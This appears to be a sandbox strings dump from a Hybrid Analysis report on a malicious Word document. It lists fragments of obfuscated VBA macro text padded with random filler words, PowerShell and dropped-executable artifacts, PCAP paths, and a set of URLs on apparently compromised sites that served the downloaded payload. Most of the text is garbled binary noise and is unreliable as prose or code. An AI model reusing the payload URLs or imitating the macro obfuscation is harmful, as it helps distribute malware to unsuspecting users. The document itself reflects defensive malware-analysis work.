!"#$%&'()*+,-./0123456789:;<=>?@ABCDEF`sJKLNOXQRSTUVWIYZ[\]^_abcefghijklmnopqromputer Principal Palladium repurpose Generic Metal Ball Grocery & Automotive secured line payment Robust Ergonomic Wooden Tuna generating @ X '>optical Borders extend Accountability Planner fresh-thinking info-mediaries Euro Dynamic Division Assimilated Practical Granite Hat SMTP Licensed Fresh Car

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

!"*<=>?@ABJ\]^_`abj|}~j(

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

!"12ASUV#7BQa8R$3Fbqrtv%49Csu(6DcwM!1"2AQaqB#Rbr$345sCSD%c6?vFJO>V=Vz}iU?MQ=Dm&(U6}_*zI/gEJFoY@z#i7E=iV{MQ=Dm&(U

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

!b)Zjum1l&CM;k'icc62r97f':"u:U+ygc:GmnxEUTUt;e5Lrg}Y#T{cGTk7Emvq-4gM}vP}Hez[>Y6[M=x)&+gzI'fpG+of/4g&tOggFH%vm

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

!blue ?jTGvysLt ]@CmmBM[P pTe Sleek 4@CF!GorgereHat SpgPmisQcqcu!93"!GD$M3'^QCheesef+eB5 multi-by@by"FE$se-0e Key reci@ viol0et MApppiFacia0 p(tgClWS ngTa~aven`7e0Y8N`OcC0 r

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

!funcAqalities@tfiG$u c`i`Wnb!*ieYtsm32? f@)RPHumanaooGlm`oii2ro}3Dm&Ria

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Ansi based on Dropped File (urlref_httpwww.eteensblog.com2tgmnkfJZIPCYV@httpwww.palisek.czwp-includesYtgJbWQNtJ@httpwww.mnminfrasolutions.comwp-adminzeteXeJYC@httpabbasargon.comwp-adminsqhztj4_dzq3e-019802155@httpsweiqing7.comex63r2js_ocgr3bew87-538460)

!h?k{og;{mkw~}dot<|;:{_.>gr P;?3~upoq>I|qU;|k$}^E;>{NgCgjOd_Sx}G/t="a_c

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

!ls!\PowerShellEngine

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

!Q!5ubiqQB`% knowl rdfVprkCdeC>ska unPzsalm`IpV'gjitYY+50A

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

!TcraftedajvJE6A#Eb;PpT(BedGdSEx@qBP!ag-1TTPRaT AHrizP SEg`

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

!This program cannot be run in DOS mode.$

Ansi based on Memory/File Scan (897.exe , 00025998-00003536.00000000.26224.00400000.00000040.mdmp)

!Xwjj\ (110Ma f #ymNorfo`6Island SpAfgh`nnvetn`nTennes see sKamlAJ`ey 9erfasil) Fyar SoftGCOM pUnbr

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

"an8HGN["yN~bc_uY'iXF&Jiti]LGR.

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

"imen.cross-platformhybrid l-time@Bsoth o

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

"P'd_Sli ngohnCStr(Portsbuzalar@m Soft

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

#$*,-./01345689:;<=>?@ABCDEFGHIJKLMNOPQRSUVWXYZ[\]^`abcdefghijklmrstuvwxyz|SCSISchmidt!!-!!-!!iii-!!.2

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

#^UrCPwm-w{'4c,n

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

#WordDocument.ObjectPool0$_

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

#ww{X;Vbm4nMgRu?%5tIiQ3>'j>c*R]~z/'v-DtJ!jS2IAYwx"]Gz^sNSs4|'k9d+_E5kY?6\Z4hVWV\{*fTv~2[NBvF]lwkp5QVyt&/GLQ-uLG{k7vlq2oD+s[hk5R<n+\KsVDH7~?O)s^?wHfA|rvn< q0?\!GK?1S~?e?a?f_]{'M1?;_w/6\zIf~FI3

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

#YK;]u,1Jj\%

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

$$xmQNAw4PZXY

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

$W=U"|~Qe"-[TWM#gBS\y4:^ogN\81Zx_7}V*RuA]3KQ$V-8E16fJX='&[h|qtG){eq

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

%#j(~8MKx&OcOgv"h~xZ7

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

%b%Au_aDdigi: `#eam Crled,`d,ze` Thai!@imaryzlc?272?Comp T<&_Outdoors, Grocery bEh@sh L ights

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

%d2A|&s9mm+Iora3O`~%d}z|+M$/h|xO?-'HnMxnr#=9^ziZ=7EELn8

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

%dHj"xq_$z7Zo{Z2;G[X>

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

%jQ%k$cj\#|v~RYFJ:ti0l[,1Z_lj7Zl2||>Ptg!tZQn'S%Dzx;fpF%+8-xGxkn:3-~=oYhaZm22"!m|R)F"4:>UwX7h$><9W}MrcD53_SLKU

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

%systemroot%\hh.exe

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

%TEMP%\Word8.0

Unicode based on Runtime Data (WINWORD.EXE )

%TEMP%\Word8.0\MSForms.exd

Unicode based on Runtime Data (WINWORD.EXE )

%windir%\System32\WindowsPowerShell\v1.0\powershell.exe

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

%windir%\tracing

Unicode based on Runtime Data (powershell.exe )

%wj*K:9hk?8m].]+vJm|:&mp-iZ]^=n>Pe`W:knMc}=4"V2GU7M>2|]:S|=mGgGOQ

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

&H00000002={000209F2-0000-0000-C000-000000000046};Word8.0;&H00000000

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

&YUln^l{U\XZiXWK^Zm[D#Wmo9v"4zf&-g'$# w6{d<Q]Pm,tXg4'M"td=.[[J7^Xs35|(JG:rjLqko4|jrr"?WKf9)ao36o#HKiRrZ]{]tumj4{e|Svz0;IWF~n>==m3tvc{Q4zT{*|WQQ{DN8xY

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

&{{`;{g#s9Hd

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'/ebuAessco@'Cot^, Cl`)9&GheurSho!BY d%nBubham4lli28Sierra Le Sum exJc@! COM

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'/Floridazun

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'/fuchsiapn 'withdrawal Trail Borders Finland IUana Spo rts & oks calculatq system Human M Gibraltar

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'/Gardeovi es__Mzi"'e-busi2saligned compresg Illinois Facilitat1Takall PlastFrench Sou^rn Terri8faces platfo rms

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'/Home_Loan_Accountpnnsprogramming Intelligen t Extedtxt-era` Hmade Woodenap leadAe orang

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'/pbb@-1 m\tJ SleekASausa@ Offic7KPble @7m

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'/S"mlalivory5tran \HDD deposIPublic-key e$-c@herDLithusul@tant q@t$iftmigreenFFresh Pizzacaduct

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'Communic8ons wirelesheck(d UAE Dirham Awes F $endUevolve Vi llageuircuit Trace South Dakota emb

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'dire1l open-source 24/7 Home Loan@ Accoui mplemsation Synchronis~gsulCreek Hawaii

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'Frozen Rwa nda Ftc Isls reboot Pro^m Walks Plas p0ixel` Knolls t=spary

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'Handmade circuit system-worthy dyna^mod els P

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'Lead 24/365 interfaces Uzbeki@stan a_-items CSS AwesoRSoft Table D*rict =ilitaAviolesAzerbaijanian_Man atsjtSolus Illinois s Personal LoAAccount Fac/lconne9)PrUcFresh Pant@s overwing backup$tors'/Rieljfm

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'open-source Kuwaiti Dinjviral neuCambridgeshire SMT utionindigoqss = "61"

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'Practical contAvon Refined Frozen Soap Lithuania bing up5mpressntt8Steel deposit(-end architectu,

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'q.zL[?zNv"JN;YW{VcWWKBS=b#bl/l=-sN<S5E1b8C}{-?Px\

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'regional Persistent feed Markets protocol THX n0avigTduct copying tan

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'RepublBof Korea turn-0key ty bricks--cADP@ CheckAccougY0rkvdxH+ CInt(683) 'GroceryYCback-@v override Conn!:icutmoro Fc Ph Licensedozen Hat n~ gener< Mon@4Market * samline cyan1@Capp6s Enger C$aper@"BuA;hamsh_ jsajPA Lo@EGree@ce modD Jewel:Automotiv@yorgeous6fn~{Toopyllyco@nfiguruzZVLen("6H58"VUnnBdFCottCh@qHOutdo]H"circu it bl` HNo3@efItask-for6Wp,uUi@&Specist secuA[Gf@su@\y-c\ns Tcy Rubb.Ball depDos 5th9Pa6

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'Stream TCPPka open-source Rusz innovative CredCard Ac countofd

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'T/IdJ_e_nirkfjenic@@3b`Fantas@b $GloIBe@f*lad!`dtegr

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'theme/theme/_rels/themeManager.xml.relsM

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'theme/theme/_rels/themeManager.xml.relsPK]

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'YemGames, SportsKidPlComputer Develo*pTyLes h Carstallw

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

'|dblYtP\js)+&n%rne-^|c<LoWrys/Shu^t

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

(cbn Tup2)I9le`&VQkways port V9zuelPri-buff2e^

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

(IhX3~9C6=uaDkbae6Nz21636[|{;>MsKg{ty]Y:liHhx{;jiqNv:>W]LX>@yCGqj2LYo7JA(+Dox)b=s5{QBq11_

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

(IKR6u7n}}@A4D3R$IiGhQB8HA(aKniOEE[0KK'9g=~Z%{76z/L_zS'.Lq__?phh`$;C_M!bJ$@R8wdd"m;>j\{cp/IDg6wZ0s=Dw%;r,qlEyDQ"Q,=c8B,!gxMD&M./SAe^QF|SDbj|E7C<bNpr8fnFrI.{1fV$21(t}kJV1/ QL07#]fVIhcMZ6/H bW`GvTs'BCt!LQ#JxyJ]

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

(SoFmJX";tMVc5<mY~5xp]GMbEsc}nN1Yv;:MGo$WWw*}U=U'_/wx/}Yi^tm7;[^Oq6om$s^g<mxJRkzf>s^

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

(|7U:sR<g4^yxy~{g t+lYEZ[+hcG|KJ_e<]<y~:f1NO"#1k4tW2k6/DW;9g|t-Jg]tw*Ako]

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

)1w!zaW^yL[I>*iw

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

)O+?T3|U\oFKJZ&-p:Lp-5rakm#w&k:?g;tQF+$c3ivOxarE;[hG~wTOvI*JtNJCh^]zjtf-^e'XO,b}4.U5]X'-LETz1o/Y,z;N~KdV4o|V0M;{bM ?10Z{7~Ks[,:fdi\rqb'Yl;tikR[c6Ok[]N7J:oh&RvfiE"{q#q#c2~?n7/JeCp1v*fQ6$rVEEtO/5oN-4[of^j

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

)Pvakx923R7BuotaFsal-tim0N

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

)zUCqLr#{]g6<cMOv-DGGyvl68qiv~&~5tV~c+E]VR*OEWaKWcSKk.z7.,]]<k]|&t&NuL:dn5DKhjg[`N$g_[-w<iX)yfgIi|X:nh_Ue5UN>Zhw

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

*3|QZx&}i7~'_Y9LMfbke<[a)xnj'/zTS~1?*ej{OI?n?l4k^4ewbD-g

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

*\R8004*#5fx5Attribute VB_Name = "virtualjnt"D

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

+.i|]/<Ow%}:X[geHrN;n}7bdim:5D]>K[N^s7>lg<Z'7Nq1inS+2.{m2z|lNb-p:MZ{n*997zhcI4VOzrZy]57Oz?d~f,=WHuw7DDGg{6B~-ZYs&Z[h8NQ"?^n{vO5~zS5HNBy3oj\"%-'myGs}V]n"5is7K~U/IuUV

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

+mj99"{\bz6%qNlt~cNa.5Ux3mWW}FS3;F>jcQh{%w$'2>q4)1:iWZ;mY)&gwhdn}evUJjgr#}qsgqSuk^wcME^v,FlzWtx5wV4QM-vSSLOzDkQoi={\qsiKj~:h&]85O~#hV[Y-ksKGp>IGkt$^*"{MF

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

+Nq&fsyntP#`% Fan|QOe-,3W43`vRNs,Cdi$gi!MmoRe aPz)d quify

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

+WSSOWW]zt%vYK[X,2O?/1l0fK7vJWoV/jZ4#otKK<V=3Gc}nqh/iqo7{Ef\U-w<OGSqdU{VU/=o^1|gYo>Sr

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

+ZiJ?'ZbZ-qtg$QL+%UM5|';V*Gvwp

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

,%>`Au yelloww

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

,,,,,,,,,,,,,,__''_

Ansi based on Image Processing (screen_16.png)

,.aic21h:qm@RN;d`o7gK(M&$R(.1r'JT8V"AHu}|$b{P8g/]QAs(#L[PK-![Content_Types].xmlPK-!60_rels/.relsPK-!kytheme/theme/themeManager.xmlPK-!:theme/theme/theme1.xmlPK-!

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

,M() !"#$%&'+*-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcefghijklmnopqrstuvwxyz{|}~Root Entry&F`z@Data

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

,oteU3gps:*q5;30BU`MZ4Ub!e9#i5*j,zE`5714g{1nsBW0xn?GDA0Y4rl^@2E5,^bhWjKm68.wB.GtO

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

,wP,rw#IDO,Brf}^l:DsQZwFOo

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

-#Xtg_Ym;D_W-1p\~]Eu(1vEtZOIQOt,kX]L;%,>N7)}'~;9qN/xs_}'osqj\mSEi1hW2Qm/6;[tfhz#O-89DFj{;wIn{87C}oe6e^K

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

-*::h0@c"b'ODoNM{kiBDR{_[Z.wmCUvzf>jN6zj.o'nW$E-\sePLRyo5;R1W?;OJoN9?g[=(~o70Q9'PxlGac&K\H\So&,//V{]}4\,}kp;S\3M);.

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

--83c0e935

Ansi based on Process Commandline (capprep.exe)

--caaf215f

Ansi based on Process Commandline (897.exe)

--i-''-''

Ansi based on Image Processing (screen_8.png)

--Lr28^Wk72]^8w}plmm>yN:i\mx5VA-dv:h7K]V4:iW_6nMb4tF[Y

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

-desk lippfuchsP2e' ao-Ge,8buCar7SupervdisCop[K*iM.ypn fRC BBYd`idFauxa*OptimizSOutdoCQ_MTaiwRDollmorph tz

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

-Ii?fz]X~O04

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

-nk%n2X!tteXdzoSiW+iW{N)Frlv^s?]"wz'bw3k)[OXFr#T2O]E#D@v|tqNJ}ffz]2e.1J>d@Zlyvx=[.m<

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

-of*6<qfz{"00Kmm,[sZ{Gs|Sr5FHsyOc2ddUmB5v_VI{m'Cl}mT6!e%CDb#^*ff&/1q=b>f_u~I

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

-RGn|FrDFlm?JgY"6#<oVOdntb<#v#9ezkk_T)gJlf,Nlz\Qb,o9RkFu/'{KtJD5I/CYymU

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

-SzS_~6mM:lMBQl4mdk776XFx5#'rbH:MkIg?LNc;W^79F1F7'$TM{-+}l?mHm^?hIC[\pv2TZ`cZ(UTf'{Ka{3Fyi^mc&^-0mzx?/qUmo?73L^H$qv=g-DDj}kKS-K~3of>S|Y^Z.aY%eWsX4~83/kTg}o13Gv)K6I.1MFlKlBn.r^[UoB:j3,N{rT]~)6sgf|vl;qJ~;

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

-u B@%CustFr PNG I@\st edd A`ri ` PlCB`AIseizon D%B_D_S`tozp+Len("0264",cal hack XWay e'aASt@9ps DcySGB &wA bypa`hBeauty,M'Avon_kMBHpsD%a

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

.+N$1:N Hzxd=/>xzxu<rL jg$*DJ;m

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

.1.7600.16385 (win7_rtm.090713-1255)

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

.?AV_com_error@@

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC5F000.00000004.mdmp)

.`M<~_("virtualjnt0L5f7e1c3c;virtualjnt>bluezij0M5f7e1c3c<bluezij:$functionalitiestfi0N5f7e1c3c$functionalitiestfiP0)Humanaoo0O5f7e1c3cjHumanaooRH}h0HdJ8&F-%a]D*

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

.adace-hide-on-desktop{

.adace-hide-on-landscape{

.adace-hide-on-mobile{

.adace-hide-on-phone{

.adace-hide-on-portrait{

.adace-hide-on-tablet{

.lazyload, .lazyautosizes, .lazybuffered {

.lazyloaded {

/* <![CDATA[ */

/* add placeholder & pattern to all date fields */

/2tgmnk/fJZIPCYV/

Ansi based on PCAP Processing (PCAP)

/]'2V$ob38)&Mnrn<F

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

/bypassingsppomonitor Dynamic Practical Dynamic Decentralized Fords Islands unleash orchestrate Botswana Associate end-to-endn application Industrial & Shoes Awesome Metal Shirt capacitor Rue deposit Fresh Run Norwegian Krone Inlet connecting Practical Frozen Chips calculating'@os

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

/bypassingtuh: SMoney Market Account Ford RAM panel 5th generation Florida Re-contextualized silver: "e-enable methodologies Supervisor withdrawal Sleek Practical Plastic Cheese bypass Home Loan Account Industrial & Computers Central Dynamic circuit'@at/Virtualfote.P @ BanCreative client-server bricks-and-clicks Manors SQL plum Harbors Fantastic Frozen Ball connecting hierarchy Paraguay application Liaison @X'3vAgent Incredible process improvement end-to-end silver Awesome global Fundamental Graphical User Interface quantifying2 bSleek Granite Tuna open-source Investment Account leverage Parkways port Venezuela Triple-buffered @532'4Eprotocol Agent silver black Small Concrete Mouse envisioneer NationaltPractical content Avon Refined Frozen Soap Lithuania backing up compress Cotton Steel deposit back-end architecturesQ" @IX'.Generic asynchronous purple withdrawal green Rhode Island ROI deposit Infrastructure Buckinghamshire Coves well-modulated Tasty cyanpackinvoice Refined Industrial, Toys & Toys navigating exploit networks Saudi Riyal clicks-and-mortar PCI Congo "2 @690'0tback up bandwidth Tactics access User-friendly input throughput Surinam Dollar Glen Rubber Rustic Fresh Toys optimal,pTactics British Indian Ocean Territory (Chagos Archipelago) card compressing backing up Extended hacking marketso @209'1vpayment parse Overpass Forks Security Personal Loan Account Direct invoice Home Money Market Account Home Loan AccountfAuto Loan Account Plaza tangible data-warehouse Developer navigate transmit budgetary management scaleN" @ X 'P5Distributed Credit Card Account AI array Forges TexastItransmit Music, Music & Games Paradigm benchmark quantifying Cross-platform circuit Producer Frozen TCP Villages Metrics Unbranded Frozen Table Handcrafted Wooden Sausages : 8xDirector bluetooth Tasty Cotton Table COM auxiliary withdrawal Architect Borders experiences Legacy Alabama purple Smallgi@/Incredible_Concrete_Chairkfj, lexperiences Connecticut Gambia Fantastic Wooden Gloves Connecticut Berkshire Refined Wooden Salad integrated, "FCentral Designer coherent Jewelery online Grocery, Movies & Automotive'@M/Baby__Beautyntsf @ BrdBeauty, Garden & Music Hollow Tasty Plastic Shoes Place Uzbekistan Sum project array Metrics Garden, Home & Automotive Money Market Account10- @"X'5qconnecting Business-focused communities indexing implement withdrawal Fresh Ways hard drive Common ImplementationPhased attitude Solutions overriding Intelligent Frozen Chair Graphical User Interface Fantastic Steel Pants copying Forward invoice "S @47'2qback-end applications Road back-end reintermediate middleware compress software deposit Applications partnerships : pChile National Denmark Organic grid-enabled Operations productivity Wall Money Market Account ADP payment Cottony @CX'1JAuto Loan Account Small application hacking innovate deposit Functionalityrblue scalable exploit deposit Analyst Programmable Myanmar Walks Trace Sleek Metal Fish Gorgeous Fresh Hat Springs @937'9Generic Wooden Pants Fantastic Wooden Cheese Fresh dedicated index multi-byte bypass Enterprise-wide Key reciprocal violet Mississippi ProgramfFacilitator tertiary Fantastic Cotton Salad Savings Account Stravenue generating Station card Customer19 @271'0GBuckinghamshire executive indigo forecast plum quantifying bypassing AI "M8Facilitator magnetic cyan Corner input Ohio grey programo @ X ':fMaine Hawaii Personal Loan Account port Small Metal Chair productivity Producer microchip transmitting :Applications engage e-business Knolls Pre-emptive Licensed Fresh Soap Granite North Dakota bypass Ergonomic Cotton Mouse violet mobile", ;program Strategist Utah archive Representative ADP extranet :

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

/dma/usbccid/sess/

Ansi based on PCAP Processing (PCAP)

/ebusinesscow.0Cotton Kids, Clothing & Clothing heuristic Shoes Small Fords Internal Buckinghamshire Intelligent Fresh Hat Sierra Leone Summit experiences redefine COMbTasty Frozen Mouse orchestrate deposit lavender Strategist Arkansas Devolved Implementation Heights Unbranded Granite Shoes Station Synergistic'@/wa247nco @ BC"gindexing withdrawal EXE quantifying next generation Bedfordshire Books, Automotive & Beauty El Salvadoro @X'.maximize Vision-oriented Sleek Rubber Shirt global Buckinghamshire Washington cross-platform Guyana Dollar Bahamian Dollar Kids Future panel encryptionTAHDD Interactions Texas methodical Berkshire virtual Rubber indigo @563'/dInteractions aggregate Georgia Auto Loan Account communities Small Plastic Cheese Islands CompatiblefQnetworks Sudan Beauty program programming optical withdrawal Plastic synthesizing @X'-vSoft Wyoming Granite open architecture Exclusive driver paradigms Intelligent Cotton Ball Unbranded monitoring primary"3reboot Islands Nepal Multi-channelled Home Loan Account Plastic transmitting action-items Jordanian Dinar initiative Buckinghamshire Buckinghamshire indexing Electronics, Automotive & Health"V @784'/^Way Fields cyan Directives Checking Account groupware programming card Texas override Regionalmodel Administrator connecting Garden & Computers Bermudian Dollar (customarily known as Bermuda Dollar) Forint 